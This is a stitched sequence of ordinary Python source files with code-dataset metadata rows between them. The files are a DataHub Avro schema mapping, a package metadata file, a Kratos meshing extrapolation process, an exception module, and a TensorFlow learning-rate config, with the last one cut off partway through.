self._inner_dict['count'] = value
@property
def userEmail(self) -> Union[None, str]:
"""Getter: If user_email is set, we attempt to resolve the user's urn upon ingest """
return self._inner_dict.get('userEmail') # type: ignore
@userEmail.setter
def userEmail(self, value: Union[None, str]) -> None:
"""Setter: If user_email is set, we attempt to resolve the user's urn upon ingest """
self._inner_dict['userEmail'] = value
__SCHEMA_TYPES = {
'com.linkedin.events.KafkaAuditHeader': KafkaAuditHeaderClass,
'com.linkedin.pegasus2avro.chart.ChartInfo': ChartInfoClass,
'com.linkedin.pegasus2avro.chart.ChartQuery': ChartQueryClass,
'com.linkedin.pegasus2avro.chart.ChartQueryType': ChartQueryTypeClass,
'com.linkedin.pegasus2avro.chart.ChartType': ChartTypeClass,
'com.linkedin.pegasus2avro.chart.EditableChartProperties': EditableChartPropertiesClass,
'com.linkedin.pegasus2avro.common.AccessLevel': AccessLevelClass,
'com.linkedin.pegasus2avro.common.AuditStamp': AuditStampClass,
'com.linkedin.pegasus2avro.common.BrowsePaths': BrowsePathsClass,
'com.linkedin.pegasus2avro.common.ChangeAuditStamps': ChangeAuditStampsClass,
'com.linkedin.pegasus2avro.common.Cost': CostClass,
'com.linkedin.pegasus2avro.common.CostCost': CostCostClass,
'com.linkedin.pegasus2avro.common.CostCostDiscriminator': CostCostDiscriminatorClass,
'com.linkedin.pegasus2avro.common.CostType': CostTypeClass,
'com.linkedin.pegasus2avro.common.Deprecation': DeprecationClass,
'com.linkedin.pegasus2avro.common.FabricType': FabricTypeClass,
'com.linkedin.pegasus2avro.common.GlobalTags': GlobalTagsClass,
'com.linkedin.pegasus2avro.common.GlossaryTermAssociation': GlossaryTermAssociationClass,
'com.linkedin.pegasus2avro.common.GlossaryTerms': GlossaryTermsClass,
'com.linkedin.pegasus2avro.common.InstitutionalMemory': InstitutionalMemoryClass,
'com.linkedin.pegasus2avro.common.InstitutionalMemoryMetadata': InstitutionalMemoryMetadataClass,
'com.linkedin.pegasus2avro.common.MLFeatureDataType': MLFeatureDataTypeClass,
'com.linkedin.pegasus2avro.common.Owner': OwnerClass,
'com.linkedin.pegasus2avro.common.Ownership': OwnershipClass,
'com.linkedin.pegasus2avro.common.OwnershipSource': OwnershipSourceClass,
'com.linkedin.pegasus2avro.common.OwnershipSourceType': OwnershipSourceTypeClass,
'com.linkedin.pegasus2avro.common.OwnershipType': OwnershipTypeClass,
'com.linkedin.pegasus2avro.common.Status': StatusClass,
'com.linkedin.pegasus2avro.common.TagAssociation': TagAssociationClass,
'com.linkedin.pegasus2avro.common.VersionTag': VersionTagClass,
'com.linkedin.pegasus2avro.common.WindowDuration': WindowDurationClass,
'com.linkedin.pegasus2avro.common.fieldtransformer.TransformationType': TransformationTypeClass,
'com.linkedin.pegasus2avro.common.fieldtransformer.UDFTransformer': UDFTransformerClass,
'com.linkedin.pegasus2avro.dashboard.DashboardInfo': DashboardInfoClass,
'com.linkedin.pegasus2avro.dashboard.EditableDashboardProperties': EditableDashboardPropertiesClass,
'com.linkedin.pegasus2avro.datajob.DataFlowInfo': DataFlowInfoClass,
'com.linkedin.pegasus2avro.datajob.DataJobInfo': DataJobInfoClass,
'com.linkedin.pegasus2avro.datajob.DataJobInputOutput': DataJobInputOutputClass,
'com.linkedin.pegasus2avro.datajob.EditableDataFlowProperties': EditableDataFlowPropertiesClass,
'com.linkedin.pegasus2avro.datajob.EditableDataJobProperties': EditableDataJobPropertiesClass,
'com.linkedin.pegasus2avro.datajob.JobStatus': JobStatusClass,
'com.linkedin.pegasus2avro.datajob.azkaban.AzkabanJobType': AzkabanJobTypeClass,
'com.linkedin.pegasus2avro.dataplatform.DataPlatformInfo': DataPlatformInfoClass,
'com.linkedin.pegasus2avro.dataplatform.PlatformType': PlatformTypeClass,
'com.linkedin.pegasus2avro.dataprocess.DataProcessInfo': DataProcessInfoClass,
'com.linkedin.pegasus2avro.dataset.DatasetDeprecation': DatasetDeprecationClass,
'com.linkedin.pegasus2avro.dataset.DatasetFieldMapping': DatasetFieldMappingClass,
'com.linkedin.pegasus2avro.dataset.DatasetLineageType': DatasetLineageTypeClass,
'com.linkedin.pegasus2avro.dataset.DatasetProperties': DatasetPropertiesClass,
'com.linkedin.pegasus2avro.dataset.DatasetUpstreamLineage': DatasetUpstreamLineageClass,
'com.linkedin.pegasus2avro.dataset.EditableDatasetProperties': EditableDatasetPropertiesClass,
'com.linkedin.pegasus2avro.dataset.Upstream': UpstreamClass,
'com.linkedin.pegasus2avro.dataset.UpstreamLineage': UpstreamLineageClass,
'com.linkedin.pegasus2avro.glossary.GlossaryNodeInfo': GlossaryNodeInfoClass,
'com.linkedin.pegasus2avro.glossary.GlossaryTermInfo': GlossaryTermInfoClass,
'com.linkedin.pegasus2avro.identity.CorpGroupInfo': CorpGroupInfoClass,
'com.linkedin.pegasus2avro.identity.CorpUserEditableInfo': CorpUserEditableInfoClass,
'com.linkedin.pegasus2avro.identity.CorpUserInfo': CorpUserInfoClass,
'com.linkedin.pegasus2avro.metadata.key.ChartKey': ChartKeyClass,
'com.linkedin.pegasus2avro.metadata.key.CorpGroupKey': CorpGroupKeyClass,
'com.linkedin.pegasus2avro.metadata.key.CorpUserKey': CorpUserKeyClass,
'com.linkedin.pegasus2avro.metadata.key.DashboardKey': DashboardKeyClass,
'com.linkedin.pegasus2avro.metadata.key.DataFlowKey': DataFlowKeyClass,
'com.linkedin.pegasus2avro.metadata.key.DataJobKey': DataJobKeyClass,
'com.linkedin.pegasus2avro.metadata.key.DataPlatformKey': DataPlatformKeyClass,
'com.linkedin.pegasus2avro.metadata.key.DataProcessKey': DataProcessKeyClass,
'com.linkedin.pegasus2avro.metadata.key.DatasetKey': DatasetKeyClass,
'com.linkedin.pegasus2avro.metadata.key.GlossaryNodeKey': GlossaryNodeKeyClass,
'com.linkedin.pegasus2avro.metadata.key.GlossaryTermKey': GlossaryTermKeyClass,
'com.linkedin.pegasus2avro.metadata.key.MLFeatureKey': MLFeatureKeyClass,
'com.linkedin.pegasus2avro.metadata.key.MLFeatureTableKey': MLFeatureTableKeyClass,
'com.linkedin.pegasus2avro.metadata.key.MLModelKey': MLModelKeyClass,
'com.linkedin.pegasus2avro.metadata.key.MLPrimaryKeyKey': MLPrimaryKeyKeyClass,
'com.linkedin.pegasus2avro.metadata.key.TagKey': TagKeyClass,
'com.linkedin.pegasus2avro.metadata.snapshot.ChartSnapshot': ChartSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.CorpGroupSnapshot': CorpGroupSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.CorpUserSnapshot': CorpUserSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.DashboardSnapshot': DashboardSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.DataFlowSnapshot': DataFlowSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.DataJobSnapshot': DataJobSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.DataPlatformSnapshot': DataPlatformSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.DataProcessSnapshot': DataProcessSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.DatasetSnapshot': DatasetSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.GlossaryNodeSnapshot': GlossaryNodeSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.GlossaryTermSnapshot': GlossaryTermSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.MLFeatureSnapshot': MLFeatureSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.MLFeatureTableSnapshot': MLFeatureTableSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.MLModelSnapshot': MLModelSnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.MLPrimaryKeySnapshot': MLPrimaryKeySnapshotClass,
'com.linkedin.pegasus2avro.metadata.snapshot.TagSnapshot': TagSnapshotClass,
'com.linkedin.pegasus2avro.ml.metadata.BaseData': BaseDataClass,
'com.linkedin.pegasus2avro.ml.metadata.CaveatDetails': CaveatDetailsClass,
'com.linkedin.pegasus2avro.ml.metadata.CaveatsAndRecommendations': CaveatsAndRecommendationsClass,
'com.linkedin.pegasus2avro.ml.metadata.EthicalConsiderations': EthicalConsiderationsClass,
'com.linkedin.pegasus2avro.ml.metadata.EvaluationData': EvaluationDataClass,
'com.linkedin.pegasus2avro.ml.metadata.IntendedUse': IntendedUseClass,
'com.linkedin.pegasus2avro.ml.metadata.IntendedUserType': IntendedUserTypeClass,
'com.linkedin.pegasus2avro.ml.metadata.MLFeatureProperties': MLFeaturePropertiesClass,
'com.linkedin.pegasus2avro.ml.metadata.MLFeatureTableProperties': MLFeatureTablePropertiesClass,
'com.linkedin.pegasus2avro.ml.metadata.MLModelFactorPrompts': MLModelFactorPromptsClass,
'com.linkedin.pegasus2avro.ml.metadata.MLModelFactors': MLModelFactorsClass,
'com.linkedin.pegasus2avro.ml.metadata.MLModelProperties': MLModelPropertiesClass,
'com.linkedin.pegasus2avro.ml.metadata.MLPrimaryKeyProperties': MLPrimaryKeyPropertiesClass,
'com.linkedin.pegasus2avro.ml.metadata.Metrics': MetricsClass,
'com.linkedin.pegasus2avro.ml.metadata.QuantitativeAnalyses': QuantitativeAnalysesClass,
'com.linkedin.pegasus2avro.ml.metadata.SourceCode': SourceCodeClass,
'com.linkedin.pegasus2avro.ml.metadata.SourceCodeUrl': SourceCodeUrlClass,
'com.linkedin.pegasus2avro.ml.metadata.SourceCodeUrlType': SourceCodeUrlTypeClass,
'com.linkedin.pegasus2avro.ml.metadata.TrainingData': TrainingDataClass,
'com.linkedin.pegasus2avro.mxe.MetadataAuditEvent': MetadataAuditEventClass,
'com.linkedin.pegasus2avro.mxe.MetadataChangeEvent': MetadataChangeEventClass,
'com.linkedin.pegasus2avro.schema.ArrayType': ArrayTypeClass,
'com.linkedin.pegasus2avro.schema.BinaryJsonSchema': BinaryJsonSchemaClass,
'com.linkedin.pegasus2avro.schema.BooleanType': BooleanTypeClass,
'com.linkedin.pegasus2avro.schema.BytesType': BytesTypeClass,
'com.linkedin.pegasus2avro.schema.DatasetFieldForeignKey': DatasetFieldForeignKeyClass,
'com.linkedin.pegasus2avro.schema.DateType': DateTypeClass,
'com.linkedin.pegasus2avro.schema.EditableSchemaFieldInfo': EditableSchemaFieldInfoClass,
'com.linkedin.pegasus2avro.schema.EditableSchemaMetadata': EditableSchemaMetadataClass,
'com.linkedin.pegasus2avro.schema.EnumType': EnumTypeClass,
'com.linkedin.pegasus2avro.schema.EspressoSchema': EspressoSchemaClass,
'com.linkedin.pegasus2avro.schema.FixedType': FixedTypeClass,
'com.linkedin.pegasus2avro.schema.ForeignKeySpec': ForeignKeySpecClass,
'com.linkedin.pegasus2avro.schema.KafkaSchema': KafkaSchemaClass,
'com.linkedin.pegasus2avro.schema.KeyValueSchema': KeyValueSchemaClass,
'com.linkedin.pegasus2avro.schema.MapType': MapTypeClass,
'com.linkedin.pegasus2avro.schema.MySqlDDL': MySqlDDLClass,
'com.linkedin.pegasus2avro.schema.NullType': NullTypeClass,
'com.linkedin.pegasus2avro.schema.NumberType': NumberTypeClass,
'com.linkedin.pegasus2avro.schema.OracleDDL': OracleDDLClass,
'com.linkedin.pegasus2avro.schema.OrcSchema': OrcSchemaClass,
'com.linkedin.pegasus2avro.schema.OtherSchema': OtherSchemaClass,
'com.linkedin.pegasus2avro.schema.PrestoDDL': PrestoDDLClass,
'com.linkedin.pegasus2avro.schema.RecordType': RecordTypeClass,
'com.linkedin.pegasus2avro.schema.SchemaField': SchemaFieldClass,
'com.linkedin.pegasus2avro.schema.SchemaFieldDataType': SchemaFieldDataTypeClass,
'com.linkedin.pegasus2avro.schema.SchemaMetadata': SchemaMetadataClass,
'com.linkedin.pegasus2avro.schema.Schemaless': SchemalessClass,
'com.linkedin.pegasus2avro.schema.StringType': StringTypeClass,
'com.linkedin.pegasus2avro.schema.TimeType': TimeTypeClass,
'com.linkedin.pegasus2avro.schema.UnionType': UnionTypeClass,
'com.linkedin.pegasus2avro.schema.UrnForeignKey': UrnForeignKeyClass,
'com.linkedin.pegasus2avro.tag.TagProperties': TagPropertiesClass,
'com.linkedin.pegasus2avro.usage.FieldUsageCounts': FieldUsageCountsClass,
'com.linkedin.pegasus2avro.usage.UsageAggregation': UsageAggregationClass,
'com.linkedin.pegasus2avro.usage.UsageAggregationMetrics': UsageAggregationMetricsClass,
'com.linkedin.pegasus2avro.usage.UserUsageCounts': UserUsageCountsClass,
'KafkaAuditHeader': KafkaAuditHeaderClass,
'ChartInfo': ChartInfoClass,
'ChartQuery': ChartQueryClass,
'ChartQueryType': ChartQueryTypeClass,
'ChartType': ChartTypeClass,
'EditableChartProperties': EditableChartPropertiesClass,
'AccessLevel': AccessLevelClass,
'AuditStamp': AuditStampClass,
'BrowsePaths': BrowsePathsClass,
'ChangeAuditStamps': ChangeAuditStampsClass,
'Cost': CostClass,
'CostCost': CostCostClass,
'CostCostDiscriminator': CostCostDiscriminatorClass,
'CostType': CostTypeClass,
'Deprecation': DeprecationClass,
'FabricType': FabricTypeClass,
'GlobalTags': GlobalTagsClass,
'GlossaryTermAssociation': GlossaryTermAssociationClass,
'GlossaryTerms': GlossaryTermsClass,
'InstitutionalMemory': InstitutionalMemoryClass,
'InstitutionalMemoryMetadata': InstitutionalMemoryMetadataClass,
'MLFeatureDataType': MLFeatureDataTypeClass,
'Owner': OwnerClass,
'Ownership': OwnershipClass,
'OwnershipSource': OwnershipSourceClass,
'OwnershipSourceType': OwnershipSourceTypeClass,
'OwnershipType': OwnershipTypeClass,
'Status': StatusClass,
'TagAssociation': TagAssociationClass,
'VersionTag': VersionTagClass,
'WindowDuration': WindowDurationClass,
'TransformationType': TransformationTypeClass,
'UDFTransformer': UDFTransformerClass,
'DashboardInfo': DashboardInfoClass,
'EditableDashboardProperties': EditableDashboardPropertiesClass,
'DataFlowInfo': DataFlowInfoClass,
'DataJobInfo': DataJobInfoClass,
'DataJobInputOutput': DataJobInputOutputClass,
'EditableDataFlowProperties': EditableDataFlowPropertiesClass,
'EditableDataJobProperties': EditableDataJobPropertiesClass,
'JobStatus': JobStatusClass,
'AzkabanJobType': AzkabanJobTypeClass,
'DataPlatformInfo': DataPlatformInfoClass,
'PlatformType': PlatformTypeClass,
'DataProcessInfo': DataProcessInfoClass,
'DatasetDeprecation': DatasetDeprecationClass,
'DatasetFieldMapping': DatasetFieldMappingClass,
'DatasetLineageType': DatasetLineageTypeClass,
'DatasetProperties': DatasetPropertiesClass,
'DatasetUpstreamLineage': DatasetUpstreamLineageClass,
'EditableDatasetProperties': EditableDatasetPropertiesClass,
'Upstream': UpstreamClass,
'UpstreamLineage': UpstreamLineageClass,
'GlossaryNodeInfo': GlossaryNodeInfoClass,
'GlossaryTermInfo': GlossaryTermInfoClass,
'CorpGroupInfo': CorpGroupInfoClass,
'CorpUserEditableInfo': CorpUserEditableInfoClass,
'CorpUserInfo': CorpUserInfoClass,
'ChartKey': ChartKeyClass,
'CorpGroupKey': CorpGroupKeyClass,
'CorpUserKey': CorpUserKeyClass,
'DashboardKey': DashboardKeyClass,
'DataFlowKey': DataFlowKeyClass,
'DataJobKey': DataJobKeyClass,
'DataPlatformKey': DataPlatformKeyClass,
'DataProcessKey': DataProcessKeyClass,
'DatasetKey': DatasetKeyClass,
'GlossaryNodeKey': GlossaryNodeKeyClass,
'GlossaryTermKey': GlossaryTermKeyClass,
'MLFeatureKey': MLFeatureKeyClass,
'MLFeatureTableKey': MLFeatureTableKeyClass,
'MLModelKey': MLModelKeyClass,
'MLPrimaryKeyKey': MLPrimaryKeyKeyClass,
'TagKey': TagKeyClass,
'ChartSnapshot': ChartSnapshotClass,
'CorpGroupSnapshot': CorpGroupSnapshotClass,
'CorpUserSnapshot': CorpUserSnapshotClass,
'DashboardSnapshot': DashboardSnapshotClass,
'DataFlowSnapshot': DataFlowSnapshotClass,
'DataJobSnapshot': DataJobSnapshotClass,
'DataPlatformSnapshot': DataPlatformSnapshotClass,
'DataProcessSnapshot': DataProcessSnapshotClass,
'DatasetSnapshot': DatasetSnapshotClass,
'GlossaryNodeSnapshot': GlossaryNodeSnapshotClass,
'GlossaryTermSnapshot': GlossaryTermSnapshotClass,
'MLFeatureSnapshot': MLFeatureSnapshotClass,
'MLFeatureTableSnapshot': MLFeatureTableSnapshotClass,
'MLModelSnapshot': MLModelSnapshotClass,
'MLPrimaryKeySnapshot': MLPrimaryKeySnapshotClass,
'TagSnapshot': TagSnapshotClass,
'BaseData': BaseDataClass,
'CaveatDetails': CaveatDetailsClass,
'CaveatsAndRecommendations': CaveatsAndRecommendationsClass,
'EthicalConsiderations': EthicalConsiderationsClass,
'EvaluationData': EvaluationDataClass,
'IntendedUse': IntendedUseClass,
'IntendedUserType': IntendedUserTypeClass,
'MLFeatureProperties': MLFeaturePropertiesClass,
'MLFeatureTableProperties': MLFeatureTablePropertiesClass,
'MLModelFactorPrompts': MLModelFactorPromptsClass,
'MLModelFactors': MLModelFactorsClass,
'MLModelProperties': MLModelPropertiesClass,
'MLPrimaryKeyProperties': MLPrimaryKeyPropertiesClass,
'Metrics': MetricsClass,
'QuantitativeAnalyses': QuantitativeAnalysesClass,
'SourceCode': SourceCodeClass,
'SourceCodeUrl': SourceCodeUrlClass,
'SourceCodeUrlType': SourceCodeUrlTypeClass,
'TrainingData': TrainingDataClass,
'MetadataAuditEvent': MetadataAuditEventClass,
'MetadataChangeEvent': MetadataChangeEventClass,
'ArrayType': ArrayTypeClass,
'BinaryJsonSchema': BinaryJsonSchemaClass,
'BooleanType': BooleanTypeClass,
'BytesType': BytesTypeClass,
'DatasetFieldForeignKey': DatasetFieldForeignKeyClass,
'DateType': DateTypeClass,
'EditableSchemaFieldInfo': EditableSchemaFieldInfoClass,
'EditableSchemaMetadata': EditableSchemaMetadataClass,
'EnumType': EnumTypeClass,
'EspressoSchema': EspressoSchemaClass,
'FixedType': FixedTypeClass,
'ForeignKeySpec': ForeignKeySpecClass,
'KafkaSchema': KafkaSchemaClass,
'KeyValueSchema': KeyValueSchemaClass,
'MapType': MapTypeClass,
'MySqlDDL': MySqlDDLClass,
'NullType': NullTypeClass,
'NumberType': NumberTypeClass,
'OracleDDL': OracleDDLClass,
'OrcSchema': OrcSchemaClass,
'OtherSchema': OtherSchemaClass,
'PrestoDDL': PrestoDDLClass,
'RecordType': RecordTypeClass,
'SchemaField': SchemaFieldClass,
'SchemaFieldDataType': SchemaFieldDataTypeClass,
'SchemaMetadata': SchemaMetadataClass,
'Schemaless': SchemalessClass,
'StringType': StringTypeClass,
'TimeType': TimeTypeClass,
'UnionType': UnionTypeClass,
'UrnForeignKey': UrnForeignKeyClass,
'TagProperties': TagPropertiesClass,
'FieldUsageCounts': FieldUsageCountsClass,
'UsageAggregation': UsageAggregationClass,
'UsageAggregationMetrics': UsageAggregationMetricsClass,
'UserUsageCounts': UserUsageCountsClass,
}
_json_converter = avrojson.AvroJsonConverter(use_logical_types=False, schema_types=__SCHEMA_TYPES)
# fmt: on
| 39.217672 | 530 | 0.659024 | 33,456 | 316,016 | 6.095588 | 0.045313 | 0.029833 | 0.043092 | 0.031491 | 0.740004 | 0.676336 | 0.618269 | 0.585807 | 0.565095 | 0.537071 | 0 | 0.001496 | 0.232096 | 316,016 | 8,057 | 531 | 39.222539 | 0.838855 | 0.228862 | 0 | 0.589232 | 1 | 0 | 0.178354 | 0.093233 | 0 | 0 | 0 | 0.000248 | 0 | 1 | 0.213161 | false | 0.002193 | 0.001994 | 0.002393 | 0.382253 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
13728c9a043db68cd4528a3cf96c45b2684dbd68 | 273 | py | Python | readcomp/__init__.py | acciochris/readcomp | 09275c23564b89cabd8d0b4f0cb537f2dca1797e | [
"MIT"
] | null | null | null | readcomp/__init__.py | acciochris/readcomp | 09275c23564b89cabd8d0b4f0cb537f2dca1797e | [
"MIT"
] | null | null | null | readcomp/__init__.py | acciochris/readcomp | 09275c23564b89cabd8d0b4f0cb537f2dca1797e | [
"MIT"
] | null | null | null | """Metadata for readcomp"""
__title__ = "readcomp"
__description__ = "Reading comprehension passage generator"
__url__ = "https://github.com/acciochris/readcomp"
__version__ = "0.1.0"
__author__ = "Chang Liu"
__license__ = "MIT"
__copyright__ = "Copyright 2020 Chang Liu"
| 27.3 | 59 | 0.754579 | 30 | 273 | 5.933333 | 0.8 | 0.089888 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029046 | 0.117216 | 273 | 9 | 60 | 30.333333 | 0.709544 | 0.076923 | 0 | 0 | 0 | 0 | 0.512195 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
137491ba7c5baf5d6e64b4e755e30ae0bbe72370 | 2,792 | py | Python | applications/MeshingApplication/python_scripts/integration_values_extrapolation_to_nodes_process.py | AndreaVoltan/MyKratos7.0 | e977752722e8ef1b606f25618c4bf8fd04c434cc | [
"BSD-4-Clause"
] | 2 | 2020-04-30T19:13:08.000Z | 2021-04-14T19:40:47.000Z | applications/MeshingApplication/python_scripts/integration_values_extrapolation_to_nodes_process.py | AndreaVoltan/MyKratos7.0 | e977752722e8ef1b606f25618c4bf8fd04c434cc | [
"BSD-4-Clause"
] | 1 | 2020-04-30T19:19:09.000Z | 2020-05-02T14:22:36.000Z | applications/MeshingApplication/python_scripts/integration_values_extrapolation_to_nodes_process.py | AndreaVoltan/MyKratos7.0 | e977752722e8ef1b606f25618c4bf8fd04c434cc | [
"BSD-4-Clause"
] | 1 | 2020-06-12T08:51:24.000Z | 2020-06-12T08:51:24.000Z | from __future__ import print_function, absolute_import, division # makes KratosMultiphysics backward compatible with python 2.6 and 2.7
# Importing the Kratos Library
import KratosMultiphysics
# Import applications
import KratosMultiphysics.MeshingApplication as MeshingApplication
def Factory(settings, Model):
if(type(settings) != KratosMultiphysics.Parameters):
raise Exception("expected input shall be a Parameters object, encapsulating a json string")
return IntegrationValuesExtrapolationToNodesProcess(Model, settings["Parameters"])
## All the processes python should be derived from "Process"
class IntegrationValuesExtrapolationToNodesProcess(KratosMultiphysics.Process):
def __init__(self, Model, settings ):
KratosMultiphysics.Process.__init__(self)
default_settings = KratosMultiphysics.Parameters("""
{
"help" : "This process extrapolates the values from integration points to the mesh nodes",
"model_part_name" : "",
"echo_level" : 0,
"average_variable" : "NODAL_AREA",
"area_average" : true,
"list_of_variables" : [],
"extrapolate_non_historical" : true
}
"""
)
settings.ValidateAndAssignDefaults(default_settings)
self.model_part = Model[settings["model_part_name"].GetString()]
extrapolation_parameters = KratosMultiphysics.Parameters("""{}""")
extrapolation_parameters.AddValue("echo_level", settings["echo_level"])
extrapolation_parameters.AddValue("average_variable", settings["average_variable"])
extrapolation_parameters.AddValue("area_average", settings["area_average"])
extrapolation_parameters.AddValue("list_of_variables", settings["list_of_variables"])
extrapolation_parameters.AddValue("extrapolate_non_historical", settings["extrapolate_non_historical"])
self.integration_values_extrapolation_to_nodes_process = MeshingApplication.IntegrationValuesExtrapolationToNodesProcess(self.model_part, extrapolation_parameters)
def ExecuteInitialize(self):
pass
def ExecuteBeforeSolutionLoop(self):
self.integration_values_extrapolation_to_nodes_process.ExecuteBeforeSolutionLoop()
def ExecuteInitializeSolutionStep(self):
pass
def ExecuteFinalizeSolutionStep(self):
self.integration_values_extrapolation_to_nodes_process.ExecuteFinalizeSolutionStep()
def ExecuteBeforeOutputStep(self):
pass
def ExecuteAfterOutputStep(self):
pass
def ExecuteFinalize(self):
self.integration_values_extrapolation_to_nodes_process.ExecuteFinalize()
def Clear(self):
pass
| 41.671642 | 171 | 0.718123 | 246 | 2,792 | 7.861789 | 0.369919 | 0.083247 | 0.080145 | 0.070321 | 0.105481 | 0.105481 | 0.105481 | 0.080662 | 0 | 0 | 0 | 0.002252 | 0.204871 | 2,792 | 66 | 172 | 42.30303 | 0.868919 | 0.062679 | 0 | 0.106383 | 0 | 0 | 0.271543 | 0.03064 | 0 | 0 | 0 | 0 | 0 | 1 | 0.212766 | false | 0.106383 | 0.06383 | 0 | 0.319149 | 0.021277 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
137867e7fe0fedffccbcd7151a465433205af790 | 483 | py | Python | ldsbde/core/exc.py | linz/lds-bde-loader | 15b5fbc962c4766b73893fa01bdde6ca9a3a6807 | [
"BSD-3-Clause"
] | null | null | null | ldsbde/core/exc.py | linz/lds-bde-loader | 15b5fbc962c4766b73893fa01bdde6ca9a3a6807 | [
"BSD-3-Clause"
] | 2 | 2019-05-08T07:58:01.000Z | 2019-08-05T08:09:03.000Z | ldsbde/core/exc.py | linz/lds-bde-loader | 15b5fbc962c4766b73893fa01bdde6ca9a3a6807 | [
"BSD-3-Clause"
] | null | null | null | """lds-bde-loader exception classes."""
class Error(Exception):
"""Generic errors."""
def __init__(self, msg):
super(Error, self).__init__()
self.msg = msg
def __str__(self):
return "%s: %s" % (self.__class__.__name__, self.msg)
class ConfigError(Error):
"""Config related errors."""
pass
class RuntimeError(Error):
"""Generic runtime errors."""
pass
class ArgumentError(Error):
"""Argument related errors."""
pass
| 18.576923 | 61 | 0.616977 | 53 | 483 | 5.245283 | 0.490566 | 0.07554 | 0.079137 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.225673 | 483 | 25 | 62 | 19.32 | 0.743316 | 0.250518 | 0 | 0.25 | 0 | 0 | 0.017857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.25 | 0 | 0.083333 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
138cf005d7526037c858c8d41fdc39bfc0da0ab3 | 6,428 | py | Python | official/modeling/optimization/configs/learning_rate_config.py | dravenVN1994/models | 8490298349a6ed77d4b4696572ed7d0ca101939c | [
"Apache-2.0"
] | 1 | 2018-08-21T22:06:10.000Z | 2018-08-21T22:06:10.000Z | official/modeling/optimization/configs/learning_rate_config.py | songhappy/models | 54832af86a4f756ec95124511483966a2575f95d | [
"Apache-2.0"
] | null | null | null | official/modeling/optimization/configs/learning_rate_config.py | songhappy/models | 54832af86a4f756ec95124511483966a2575f95d | [
"Apache-2.0"
] | 1 | 2020-08-31T19:12:34.000Z | 2020-08-31T19:12:34.000Z | # Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Dataclasses for learning rate schedule config."""
from typing import List, Optional
import dataclasses
from official.modeling.hyperparams import base_config
@dataclasses.dataclass
class ConstantLrConfig(base_config.Config):
"""Configuration for constant learning rate.
This class is a containers for the constant learning rate decay configs.
Attributes:
name: The name of the learning rate schedule. Defaults to Constant.
learning_rate: A float. The learning rate. Defaults to 0.1.
"""
name: str = 'Constant'
learning_rate: float = 0.1
@dataclasses.dataclass
class StepwiseLrConfig(base_config.Config):
"""Configuration for stepwise learning rate decay.
This class is a container for the piecewise constant learning rate scheduling
configs. It will configure an instance of PiecewiseConstantDecay keras
learning rate schedule.
An example (from keras docs): use a learning rate that's 1.0 for the first
100001 steps, 0.5 for the next 10000 steps, and 0.1 for any additional steps.
```python
boundaries: [100000, 110000]
values: [1.0, 0.5, 0.1]
Attributes:
name: The name of the learning rate schedule. Defaults to PiecewiseConstant.
boundaries: A list of ints of strictly increasing entries. Defaults to None.
values: A list of floats that specifies the values for the intervals defined
by `boundaries`. It should have one more element than `boundaries`.
The learning rate is computed as follows: [0, boundaries[0]] ->
values[0] [boundaries[0], boundaries[1]] -> values[1]
[boundaries[n-1], boundaries[n]] -> values[n] [boundaries[n],
end] -> values[n+1] Defaults to None.
"""
name: str = 'PiecewiseConstantDecay'
boundaries: Optional[List[int]] = None
values: Optional[List[float]] = None
@dataclasses.dataclass
class ExponentialLrConfig(base_config.Config):
"""Configuration for exponential learning rate decay.
This class is a containers for the exponential learning rate decay configs.
Attributes:
name: The name of the learning rate schedule. Defaults to ExponentialDecay.
initial_learning_rate: A float. The initial learning rate. Defaults to None.
decay_steps: A positive integer that is used for decay computation. Defaults
to None.
decay_rate: A float. Defaults to None.
staircase: A boolean, if true, learning rate is decreased at discreate
